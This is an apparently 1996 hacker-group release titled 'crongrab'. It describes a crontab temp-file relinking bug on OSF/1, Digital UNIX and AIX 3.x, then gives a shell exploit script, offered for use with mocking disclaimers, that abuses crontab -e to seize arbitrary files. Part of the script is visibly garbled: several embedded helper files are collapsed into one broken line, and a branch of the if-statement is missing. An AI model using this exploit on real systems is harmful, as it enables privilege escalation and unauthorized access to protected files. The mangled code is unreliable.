[r00t.1] [crongrab] [public release]

Crontab has a bug.  You run crontab -e, then you goto a shell, relink the
temp fire that crontab is having you edit, and presto, it is now your
property.  This bug has been confirmed on various versions of OSF/1, Digital
UNIX 3.x, and AIX 3.x

If, while running my script, you somehow manage to mangle up your whole
system, or perhaps do something stupid that will place you in jail, then
neither I, nor sirsyko, nor the other fine folks of r00t are responsible.

Personally, I hope my script eats your cat and causes swarms of locuses to
decend down upon you, but I am not responsible if they do.

--kmem.

[-- Script kiddies cut here -- ]
#!/bin/sh
 
# This bug was discovered by sirsyko Thu Mar 21 00:45:27 EST 1996
# This crappy exploit script was written by kmem.
# and remember if ur not owned by r00t, ur not worth owning
#
# usage: crongrab  
 
echo Crontab exploit for OSF/1, AIX 3.2.5, Digital UNIX, others???
echo if this did not work on OSF/1 read the comments -- it is easy to fix.
 
if [ $# -ne '2' ]; then
 echo "usage: $0  "
 exit
fi
 
HI_MUDGE=$1
YUMMY=$2
export HI_MUDGE
 
UNAME=`uname`
GIRLIES="1.awk aix.sed myedit.sh myedit.c .r00t-tmp1"
 
#SETUP the awk script
cat >1.awk <aix.sed <myedit.sh <.r00t-tmp1
 sed -f aix.sed .r00t-tmp1 > $YUMMY
elif [ $UNAME =  "OSF1" ]; then
 #FOR DIGITAL UNIX 3.X or higher machines uncomment these 2 lines
 crontab -e 2>.r00t-tmp1
 awk -f 1.awk .r00t-tmp1 >$YUMMY
 # FOR PRE DIGITAL UNIX 3.X machines uncomment this line
 #crontab -l 2>&1 > $YUMMY
else
 echo "Sorry, dont know your OS. But you are a bright boy, read the skript and"
 echo "Figger it out."
 exit
fi
 
echo "Checkit out  - $YUMMY"
echo "sirsyko and kmem kickin it out."
echo "r00t"
 
#cleanup our mess
crontab -r
VISUAL=$oldvis
EDITOR=$oldedit
HI_MUDGE=''
YUMMY=''
export HI_MUDGE
export YUMMY
export VISUAL
export EDITOR
rm -f $GIRLIES